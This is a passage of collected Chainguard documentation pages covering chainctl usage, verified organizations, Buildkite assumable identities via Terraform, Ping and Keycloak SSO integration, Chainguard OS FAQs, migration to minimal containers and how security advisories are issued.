"Host: hello.example.com" localhost:8080 This will return Hello, world! to the terminal output. Clean up your kind cluster Once you are done, you can delete your kind cluster: kind delete cluster This will delete the default cluster context, kind. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Istio Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Verified Organizations URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/verified-orgs/ Last Modified: March 21, 2024 Tags: Product, Conceptual Resources on the Chainguard platform are organized in a hierarchical structure called IAM Organizations. Single customers or organizations typically use a single root-level Organization to manage their Chainguard resources. Organizations can optionally be verified. Verification modifies some aspects of the Chainguard platform user experience to help large organizations guide their user base to the correct resources. Verifying your Organization Verification is currently a manual process. To verify your organization, please contact your customer support contact. You can check if your organization is verified using chainctl. chainctl iam organization ls -o json | jq Verified organizations will have a field verified: true set. [ { "id": "f5a2c73d75a8d7fe666ecb623c79a2b771d78765", "name": "example.com", "resourceLimits": { "clusters": 3, "idps": 1 }, "verified": true } ] Verified Organizations and Custom Identity providers If you’ve configured a custom identity provider and your organization is verified, you can select your identity provider by providing the name of your organization when authenticating. When authenticating with chainctl, the --org-name flag can be passed. Here, the command uses the example organization name example.com. chainctl auth login --org-name example.com As an alternative, you can set the organization name by editing the chainctl configuration file. You can do so with the following command. chainctl config edit This will open a text editor (nano, by default) where you can edit the local chainctl config. Add the following lines to this file. default:org-name:example.comYou can also set this with a single command using the chainctl config set subcommand, as in this example. chainctl config set default.org-name example.com Once set, the configured identity provider will be used automatically any time you run chainctl auth login. When authenticating via the Chainguard Console, your organization name is detected from your email address in most cases. If your organization name does not match your email domain, it can be input manually to select your custom identity provider. Verified Organizations and Chainguard Containers If you’ve purchased Chainguard Containers, your images are available via a private catalog. Your images are available to pull via cgr.dev/<org id>/<image name>, where <org id> is the unique identifier for your organization. Once your organization is verified, you can use the name of your organization instead of your organization identifier. For example, if your organization is named example.com and is verified, you can pull private images from your catalog with cgr.dev/example.com/<image name>. Restrictions for Verified Organizations Once an organization is verified, its name can be used interchangeably with the organization’s unique ID. Changes to the name can break image pulls from your private catalog and break authentication for users that have configured custom identity providers. For that reason, modifying the name of a verified organization is not currently possible. If you need to modify the name of your verified organization, please contact support. --- ### Create an Assumable Identity for a Buildkite Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/buildkite-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Buildkite pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Buildkite agent and pipeline you can use to test out the identity you’ll create. We recommend following Buildkite’s Getting Started guide to set these up. Creating Terraform Files We will be using Terraform to create an identity for a Buildkite pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/buildkite-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the buildkite.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, buildkite.tf. buildkite.tf The buildkite.tf file is what will actually create the identity for your Buildkite workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "buildkite" { parent_id = data.chainguard_group.group.id name = "buildkite" description = <<EOF This is an identity that authorizes Buildkite workflows for this pipeline to assume to interact with chainctl. EOF claim_match { issuer = "https://agent.buildkite.com" subject_pattern = "organization:<organization-name>:pipeline:<pipeline-name>:ref:refs/heads/main:commit:[0-9a-f]+:step:" } } First, this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named buildkite and has a brief description. The most important part of this section is the claim_match. When the Buildkite workflow tries to assume this identity later on, it must present a token matching the issuer and subject specified here in order to do so. The issuer is the entity that creates the token, while the subject is the entity (here, the Buildkite pipeline build) that the token represents. In this case, the issuer field points to https://agent.buildkite.com, the issuer of JWT tokens for Buildkite pipelines. Instead of pointing to a literal value with a subject field, though, this file points to a regular expression using the subject_pattern field. When you run a Buildkite pipeline, it generates a unique commit for each build. Passing the regular expression [0-9a-f]+ allows you to generate an identity that will work for every build from this pipeline. You may refer to the official Buildkite documentation for more details on how Buildkite issuer and subject claims can be formatted to suit your specific needs. For the purposes of this guide, though, you will need to replace <organization-name> and <pipeline-name> with the name of your Buildkite organization and the name of your Buildkite pipeline. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "buildkite-identity" { value = chainguard_identity.buildkite.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.buildkite.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. First, though, you’ll need to log in to chainctl to ensure that Terraform can create the Chainguard resources. chainctl auth login Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + buildkite-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output an buildkite-identity value. ... Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: buildkite-identity = "<your buildkite identity>" This is the identity’s UIDP (unique identity path), which you configured the buildkite.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Buildkite workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls You’re now ready to edit a Buildkite pipeline in order to test out this identity. Testing the identity with a Buildkite pipeline To test the identity you created with Terraform in the previous section, navigate to your Buildkite pipeline. From the Buildkite Dashboard, click Pipelines in the top navigation bar and then click on the pipeline you specified in the buildkite.tf file. From there, click the Edit Steps button to add the following commands to a step in your pipeline. Be sure to replace <your buildkite identity> with the identity UIDP you noted down in the previous section. - command: | curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" chmod +x chainctl token=$(buildkite-agent oidc request-token --audience issuer.enforce.dev) ./chainctl auth login --identity-token $token --identity <your buildkite identity> ./chainctl auth configure-docker --identity-token $token --identity <your buildkite identity> ./chainctl images repos list docker pull cgr.dev/<organization>/<repo>:<tag> These commands will cause your Buildkite pipeline to download chainctl and make it executable. It will then sign in to Chainguard using the Buildkite identity you generated previously. If this workflow can successfully assume the identity, then it will be able to execute the chainctl images repos list command and retrieve the list of repos available to the organization. There are a couple ways you can add commands to an existing Buildkite pipeline, so follow whatever procedure works best for you. If you followed the Getting Started guide linked in the prerequisites, your pipeline will have a structure like this. steps: - label: "Pipeline upload" command: buildkite-agent pipeline upload You could add the commands for testing the identity like this. steps: - label: "Buildkite test" command: | buildkite-agent pipeline upload curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" chmod +x chainctl token=$(buildkite-agent oidc request-token --audience issuer.enforce.dev) ./chainctl auth login --identity-token $token --identity <your buildkite identity> ./chainctl auth configure-docker --identity-token $token --identity <your buildkite identity> chainctl images repos list Click the Save and Build button. Ensure that your Buildkite agent is running, and then wait a few moments for the pipeline to finish building. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, returning the images available to the organization. Then it will pull an image from the organization’s repository. ... chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of listing repos, you could have the workflow inspect the organization. chainctl iam organizations ls Of course, the Buildkite pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/buildkite-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using Buildkite, we encourage you to check out the official project documentation, particularly their documentation on Buildkite OIDC. --- ### How To Integrate Ping Identity SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/ping-id/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports Single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create a Ping Identity Application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Ping and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. A Ping Identity account over which you have administrative access. Create a Ping Identity Application To integrate the Ping identity provider with the Chainguard platform, sign on to Ping Identity and navigate to the Dashboard. Click on the Applications tab in the left-hand sidebar menu, and then click on Applications in the resulting dropdown menu. From the Applications landing page, click the plus sign (➕) to set up a new application. Configure the application as follows: Application Name: Set a descriptive name (such as “Chainguard”) and optional description to ensure users recognize this application is for authentication to the Chainguard platform. Icon: You can optionally add a Chainguard logo icon here to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. Application Type: Select OIDC Web App. After setting these details, click the Save button. Next, configure scopes for the application. In the Overview tab, click the Resource Access scope button. Add email and profile scopes, then save. Next, configure the OIDC application. Navigate to the Configuration tab and click the pencil-shaped “edit” icon. To configure the application, add the following settings. Response Type: Select the Code checkbox. Grant Type: Select the Authorization Code checkbox, and set PKCE Enforcement to “Optional.” Warning: Setting a grant type other than Authorization Code may compromise your security posture. Redirect URIs: Set the Redirect URI to https://issuer.enforce.dev/oauth/callback. Click the Save button to save your configuration. Finally, enable the Chainguard application by toggling the button in the top right corner. This completes configuration of the Ping application. You’re now ready to configure the Chainguard platform to use it. Configuring Chainguard to use Ping SSO Now that your Okta application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard make a note of the following settings from your Ping application. These can be found in the Ping console under the Configuration tab of the Application page. Client ID Client Secret Issuer URL You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=ping-id export CLIENT_ID=<your client id here> export CLIENT_SECRET=<your client secret here> export ISSUER=<your issuer url here> export ORG=<your organization UIDP here> chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers guide for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Ping Identity login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Chainguard OS FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-os/faq/ Last Modified: July 3, 2025 Tags: Chainguard OS, Product Learn answers to your questions about Chainguard OS. What is Chainguard OS? Chainguard OS is a minimal, hardened Linux-based operating system designed for secure, containerized software delivery. Built in-house by Chainguard, it serves as the foundation for Chainguard’s container products and emphasizes continuous integration, immutable artifacts, and alignment with upstream software. What is the relationship between Chainguard OS and Wolfi? Wolfi refers to the OS of Chainguard’s free starter container images. Chainguard OS refers to the production-grade distribution that powers all other Chainguard products. Please note that mixing-and-matching content across Wolfi and Chainguard OS is not supported. What are the core principles behind Chainguard OS? Chainguard OS is built around four core principles: Continuous Integration and Delivery (CI/CD) Nano Updates and Rebuilds Minimal, Hardened, Immutable Artifacts Delta Minimization Each of these principles ensures that Chainguard OS can provide a more secure and efficient platform for software distribution. What makes Chainguard OS different from traditional Linux distributions? Chainguard OS is designed specifically for more secure and containerized application delivery. Our approach differs from traditional distros in several key ways: No LTS model: instead of fixed major releases, Chainguard OS continuously delivers updates in alignment with upstream changes. Purpose-built containers: Chainguard OS is focused on “application systems” instead of a general-purpose operating system. Minimal package footprint: Chainguard OS ships only what is strictly needed, avoiding unnecessary libraries and tools. Automation-driven: using CI/CD pipelines, Chainguard OS delivers more secure, tested, and verifiable artifacts. Ephemeral design: Chainguard OS embraces container-native patterns, making updates and rollbacks trivial. What are the benefits of using Chainguard OS? Security — reduced attack surface, hardened builds, and continuous patching. Compliance — automatically generated SBOMs and provenance metadata for all artifacts. Operational efficiency — reduces long upgrade cycles and manual patching. Supply chain integrity — built using the Chainguard Factory and adhering to SLSA standards. --- ### How To Integrate Keycloak with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/keycloak/ Last Modified: April 4, 2025 Tags: Chainguard Containers, Procedural By default, the Chainguard platform supports Single sign-on (SSO) authentication for users with GitHub, GitLab, and Google. This guide outlines how to create a Keycloak Client on your existing Keycloak instance and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Keycloak and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following: chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An existing Keycloak instance with admin access to the realm you will be using to authenticate. Create a Keycloak Client To integrate Keycloak with the Chainguard platform, log in to your Keycloak admin interface. In the left-hand navigation menu, select Create client. Set the Client Type to OIDC Connect, and set your Client ID. Add a friendly Name and Description if desired. Take note of your Client ID value that you have set. You’ll need this to configure the Chainguard platform to use this Keycloak Client. Click Next. Toggle Client Authentication on and click Next. Set the Chainguard platform redirect URI in the Valid redirect URIs field. Click Save to finalize the creation of your Keycloak Client. Navigate to the Credentials tab of your newly created client. Copy the Client Secret value. You’ll need this to configure the Chainguard platform to use this Keycloak Client. Configuring Chainguard to use your Keycloak Client Now that your Keycloak Client is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, a backup account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard, make a note of the following details from your Keycloak Client: Client ID: This can be found on the Settings tab of the Keycloak Client. Client Secret: This can be found on the Credentials tab of the Keycloak Client. Issuer: Your Issuer url is defined by the following pattern https://<KEYCLOAK_SERVER_ADDRESS>/realms/<REALM_NAME> You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications on who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands. export NAME=keycloak-idp export CLIENT_ID=<your application/client id here> export CLIENT_SECRET=<your client secret here> export ORG=<your organization UIDP here> export ISSUER="https://<KEYCLOAK_SERVER_ADDRESS>/realms/<REALM_NAME>" chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers article for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Okta login flow, allowing you to complete the login process through there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Get Started with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/getting-started-with-chainctl/ Last Modified: March 3, 2025 Tags: chainctl, Getting Started, Product, Basics This page presents some of the more commonly used basic chainctl commands to help you get started. For a full reference of all commands with details and switches, see chainctl Reference. Authenticate and Check Auth Status To use chainctl, the first thing you must do is authenticate with the Chainguard platform. Do so with: chainctl auth login This will present a list of identity providers for you to select from. Use the one that is tied to your Chainguard Account. Once you select the one you wish to use, such as Google, chainctl will open a browser window for you to log in with your credentials. Upon successful login, you will have the option to save this identity provider as your default for future logins. Then a token will be exchanged and you will be able to use chainctl. To check your authentication status at any time, enter: chainctl auth status This will list your identity and other attributes tied to your account, including your account’s assigned roles and capabilities. To create a pull token, use: chainctl auth pull-token To configure a Docker credential helper, which will use a token to pull images when using Docker, use: chainctl auth configure-docker Update chainctl to the Latest Release To see which chainctl version you have installed, use: chainctl version To update your chainctl installation, use: chainctl update Updating requires administrative privileges, so be prepared to enter your machine’s admin password. Configure chainctl chainctl comes with a default configuration, but there are aspects of it that can be adjusted. Examples include setting the registry location that will be used when one is not mentioned in an issued command. To edit the current configuration, use: chainctl config edit If you make a mistake and can’t recall the original settings, reset the configuration to default settings with: chainctl config reset Learn more at How to Manage chainctl Configuration. List Available Images To see which Chainguard Containers are available to your account, use: chainctl images list Be warned, that list may take a while to generate and is likely to scroll past quickly in your command line terminal. Compare Two Image Versions Let’s say you want to compare two versions of an image for the same package. You need to know the URL for your repo, the image name, and the two versions you want to compare. For versions, you can use release numbers like 8.12.0 or you can use latest or latest-dev. Use this, where we show the repo used by our Chainguard Developer Education team and where both instances of <image_name> are the same: chainctl images diff cgr.dev/chainguard.edu/$IMAGENAME>:latest cgr.dev/chainguard.edu/$IMAGENAME:latest-dev If a requested image or release being requested is not available in the repo you are using, this will return a Forbidden error, just like if you tried to pull an image you did not have access to or from a repository your account is not authorized to use. Learn more at How To Compare Chainguard Containers with chainctl. List Available Package Versions If you want to get details about the various package versions available that can be used in images, use: chainctl packages versions list $PACKAGENAME This will list all the versions that Chainguard has built and the end-of-life date for each version that has one assigned. It will also list older package versions that are no longer available. Output Formats Commands may have a default format for output, but that doesn’t mean you have to stick with it. There is an option available to tell chainctl the output format to use, like this: chainctl $COMMAND -o $FORMAT The -o is followed by one of the following strings: csv, id, json, none, table, terse, tree, or wide. Not all output formats make sense for all commands, so test thoroughly before you use any specific format in automation. --- ### Migration Best Practices and Checklist URL: https://edu.chainguard.dev/chainguard/migration/migration-checklist/ Last Modified: February 3, 2025 Tags: Chainguard Containers, Product Chainguard container images are designed to be minimal and to include special features for increased security and provenance attestation. Depending on your current base image and customizations, you may need to make some adjustments when migrating your current workloads to use Chainguard Containers. This checklist provides a high-level overview of the steps you should consider when migrating to Chainguard Containers. Download the PDF version of this checklist here! Important to Know Most Chainguard Container Containers don’t have a package manager or a shell by default. These are distroless images intended to be used as slim runtimes for production environments. For every version of an image, a complimentary standard image is provided with a shell and the apk package manager. These are identified by the -dev suffix and can be customized. When possible, we recommend using multistage builds that combine a build stage based on a -dev variant and a runtime stage based on a distroless image. Chainguard Containers typically don’t run as root, so a USER root statement may be required before installing software. Chainguard Containers are based on apk. If you’re coming from Debian or Ubuntu you’ll need to replace apt commands with their apk equivalents. This also applies for other distros that are not based on apk. Some images may behave differently than their equivalent in other distros, due to differences in entrypoint and shell availability. Always check the image documentation for usage details. Migration Checklist Check the image’s overview page on the Containers Directory for usage details and any compatibility remarks. Replace your current base image with a standard -dev (such as latest-dev) variant as a starting point. Add a USER root statement before package installations or other commands that must run as an administrative user. Replace any instances of apt install (or equivalent) with apk add. Use apk search on a running container or the APK Explorer tool to identify packages you need – some commands might be available with different names or bundled with different packages. When copying application files to the image, make sure proper permissions are set. Switch back to a nonroot user so that the image does not run as root by default. Build and test your image to validate your setup. Optional: migrate your setup to a multi-stage build that uses a distroless image variant as runtime. Our Getting Started with Distroless guide has detailed information on how to work with distroless images and multi-stage builds. For detailed migration guidance, please refer to our Migration Docs on Chainguard Academy. For troubleshooting, check our Debugging distroless containers resource. --- ### Understanding Chainguard's Container Variants URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/differences-development-production/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Product Chainguard Containers follow a distroless philosophy, meaning that only software absolutely necessary for a specific workload is included in an image. Designed to be as minimal as possible, Chainguard’s standard container images do not contain package managers such as apk, shells such as b/a/sh, or development utilities such as Git or text editors. However, this distroless approach isn’t suitable for every use case. For this reason, most Chainguard Containers have what’s called a development variant. These variants are designed for development tasks such as building, testing, or debugging. They can be used to build software artifacts that are then copied into standard images as part of a multi-stage build, or to test workflows interactively in an environment similar to a standard image. Development images contain familiar utilities such as package managers and shells. While our standard images have advantages related to security, development images are also secure and production-ready. Development images are tagged :latest-dev. To benefit from the most minimal potential attack surface, we recommend using a multi-stage build that leverages the development container image as a builder for a distroless standard container image. However, development images are useful as they are throughout the development lifecycle. This article explains some of the key features of development container variants and how they differ from our standard container images and outlines ways these variants come together in creating a secure deployment. Note: Any time this article mentions Chainguard’s “standard” container images, it’s referring to our minimal, distroless container images. In the context of this article, any non-development variant is considered a “standard” container image. Chainguard Container Security Chainguard’s standard container images have the following advantages: Our standard container images contain fewer packages. While Chainguard moves quickly to patch CVEs in all images, our standard, distroless images still experience fewer CVEs overall. Reducing the number of packages also reduces the potential number of unknown vulnerabilities that might apply to an image. Not all executables are created equal. Shells such as bash, package managers such as apk, and communication-ready utilities such as Git and curl are general-purpose tools that are broadly exploitable. A smaller image can use fewer resources and reduce deployment time. In some cases, especially with already-large images, a smaller version can make a deployment more stable or robust. Removing unnecessary components increases the observability and transparency of the image. Reducing the number of components can facilitate risk assessment or post-incident reporting. While our standard images can be considered to have advantages for security, the development variants of Chainguard Containers are also low-to-no CVE, include useful attestations such as SLSA provenance and SBOMs, and follow other security best practices. You should feel comfortable using these secure development images in production if they better fit your use case. Using Development Images Though using Chainguard’s standard container images in your final deployment will give you the benefits of distroless, development images have many use cases. These include: Building: In many Dockerfile builds, you will need to generate software artifacts such as static binaries or virtual environments as part of the build process. Development images are ideal for this use case, and after these artifacts have been generated they can be copied to a standard image for use. See How to Port a Sample Application to Chainguard Containers for a detailed example. Debugging: Our development images contain a number of useful utilities, but are otherwise designed to be as close as possible to the standard variant. This makes them useful for debugging, since you can test out build steps or the build environment using interactive shells and package managers. See Debugging Distroless Images for more on this use case. Training: In the case of AI images, you can use a development variant to train a model, then run the model in inference using a standard image. Deploying: Development images are low-to-no CVE and are suitable for production. Special Considerations It’s likely already clear that switching to our standard images requires a few changes in development and deployment. Here are a few additional considerations: Since we don’t include general-purpose shells in most standard container images, the entrypoint to these images will vary by each image’s use case. Check the documentation for each image, and note that Dockerfile commands such as CMD will be directed to the image-specific entrypoint. Because we aim to keep our development images as close as possible to our standard images, these changes to entrypoint also affect development container images. Chainguard Containers use a less privileged user by default. When using our development images, you will need to explicitly access the image with the root user — such as by using the --user root option — to perform tasks such as installing packages with apk. Conclusion Taking the step into distroless by using our standard Chainguard Containers can be an adjustment. Our development images provide options and flexibility as you secure your production infrastructure. Development images are also secure and ready for use in production. Resources Blog: Minimal container images: Towards a more secure future Chainguard Academy: Overview of Chainguard Containers Chainguard Academy: Debugging Distroless Images --- ### How Chainguard Issues Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/how-chainguard-issues/ Last Modified: April 11, 2025 Tags: Product, Chainguard Containers, CVE When you scan a newly-built Chainguard Container with a vulnerability scanner, typically, no CVEs will be reported. However, as software packages age, more vulnerabilities are reported and CVEs will begin to accumulate in container images. When this happens, Chainguard releases security advisories to communicate these vulnerabilities to downstream images users. In alignment with the Chainguard Container Product Release Lifecycle, our vulnerability management strategy focuses on the latest versions of any given release track, as these are the versions we actively maintain and secure. Accordingly, we only publish new CVE advisories for packages that fall within our defined support scope. We do not actively monitor non-supported versions of a package or image. Our efforts are centered on keeping the latest versions up-to-date and as close to zero CVEs as we can, while encouraging customers to upgrade and stay on supported versions. Chainguard publishes its security advisories to a dedicated Security Advisories page on its container images Directory. There, you can find a complete listing of CVEs found in various Chainguard Containers, including their CVE ID, affected packages, and vulnerability status. Each advisory is built from the metadata associated with a security vulnerability. You can also find consumable Alpine-style secdb security advisory feeds at the following URLs: Wolfi OS feed: packages.wolfi.dev/os/security.json Chainguard Enterprise feed: packages.cgr.dev/chainguard/security.json You can find more information regarding these security feeds at our foundational concepts overview page in our vulnerability scanner support GitHub repository. If you’re wondering how these security advisories are made, you’re in the right place! In this article, we will walk through the life of a security advisory, starting from a CVE’s disclosure, all the way to its remediation. We’ll also explore what happens after an advisory is released and how its record may be updated over time. Stages of a Security Advisory Stage 1: A CVE is Disclosed All security advisories begin with the disclosure of a security vulnerability. The CVE Project coordinates the processing of reported vulnerabilities through a network of CVE Numbering Authorities (CNAs). CNAs assign CVE IDs to new entries, and they are then added to a CVE Catalog. Each catalog entry contains information such as what packages or components are affected by the vulnerability, their versions, and remediation procedures, if applicable. Stage 2: Scanners Detect the CVE The National Vulnerability Database (NVD), the U.S. government vulnerability repository, will pick up these CVE records and review them further. During this secondary review process, the CVE entry is enriched with details that scanners later use to identify affected software. This process can take some time, so there will be issued CVEs that have not yet been analyzed by the NVD. These CVEs pending review will be marked as such by the NVD, as shown in the following image. In addition to the NVD, vulnerability scanners also reference other databases such as the GitHub Advisory Database (GHSA) and the Go Vulnerability Database. Stage 3: Advisory is Issued Once a CVE has been reviewed by the NVD, it will be picked up by vulnerability scanners and reported in any affected container images. Chainguard uses Grype, an open-source vulnerability scanner from Anchore, as its primary tool for vulnerability detection. The newly detected CVE is then moved into the next phase where it waits for a team member to assess it. A security advisory will be issued with the status of “Under Investigation” to alert downstream users that Chainguard is aware of its presence. Security advisories are issued per package, as one CVE may impact different packages in different ways. From there, this security advisory will be updated over time. Stage 4: Advisory is Updated With an advisory issued for the package, further investigation is often needed to determine the impact of the CVE. In some cases, it will be determined that the CVE is not truly present in the package, therefore making it a false positive. The associated security advisory would have its status updated to “Not Affected”, and further updates to the advisory would not occur. If the vulnerability is a true positive finding, then it is present in the package and further action must be taken. When an upstream fix is available, such as a newer package version which remediates the CVE, then this update will be made and the advisory modified to state the 